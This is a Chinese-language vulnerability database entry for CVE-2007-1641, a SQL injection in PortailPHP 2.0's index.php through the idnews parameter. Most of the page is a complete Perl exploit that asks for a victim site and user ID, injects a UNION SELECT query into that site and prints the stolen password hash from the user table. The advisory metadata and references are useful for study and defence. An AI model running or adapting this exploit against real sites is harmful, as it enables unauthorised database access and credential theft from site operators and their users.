PortailPHP index.php SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112518 漏洞类型 SQL注入
发布时间 2007-03-22 更新时间 2007-03-27
CVE编号 CVE-2007-1641 CNNVD-ID CNNVD-200703-607
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3543
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-607
|漏洞详情
PortailPHP2.0版本的index.php中存在SQL注入漏洞。远程攻击者可以借助idnews参数,执行任意的SQL指令。
|漏洞EXP
use LWP::Simple;
print "
Exploit Coded (c) by xoron
Portail PHP v20 (index.php) Remote SQL Injection Exploit
Languages: Turkish, English
Plz Select Language:";
$dil = <stdin>;
%eng = (
"site" => "Enter The Victim Without http://:",
"path" => "Plz Select Path:",
"id" => "Plz Select User ID:"
);
%turk = (
"site" => "Site Adi http:// ile baslayan:",
"path" => "Dizin:",
"id" => "ID: "
);
if($dil=~/^turkish$/i){
%dil = %turk;
}
elsif($dil=~/^english$/i){
%dil = %eng;
}
else{print "Undefined Language"; exit}
print $dil{site};
chop($site=<stdin>);
$site = "http://$site" if !($site=~/^http/);
print $dil{path};
chop($dir=<stdin>);
$dir = "/portailphp/" if !$dir;
print $dil{id};
chop($id =<stdin>);
$id = 2 if !$id;
print "Connecting to $site\n";
$sql = "index.php?affiche=Comment&act=lire&idnews=-1/**/union/**/select/**/0,";
$sql .= "1,2,US_pwd,4,5,6,7,8,9,10/**/from/**/pphp_user/**/where/**/US_uid=$id/*";
$get = get("$site$dir$sql");
if($get){
if($get=~/<td><strong>\&nbsp\;\&nbsp\;(.*?)<\/strong>/){
print "You are very Lucky Boy\nI Got Hash 4 ya\nID: $id\nHash: $1";
exit
}
elsif($get=~/<td><strong>(.*?)<\/strong>/){
print "Yep I got hash 4 ya\nID: $id\nHash: $1\n";
exit;
}
else{print "Exploit Failed\n";exit}
}
print "Connect Failed to $site\n";
exit;

# milw0rm.com [2007-03-22]
|参考资料

来源:BID
名称:23096
链接:http://www.securityfocus.com/bid/23096
来源:MILW0RM
名称:3543
链接:http://www.milw0rm.com/exploits/3543
来源:OSVDB
名称:34410
链接:http://osvdb.org/34410
来源:XF
名称:portailphp-idnews-sql-injection(33145)
链接:http://xforce.iss.net/xforce/xfdb/33145
来源:SECUNIA
名称:24620
链接:http://secunia.com/advisories/24620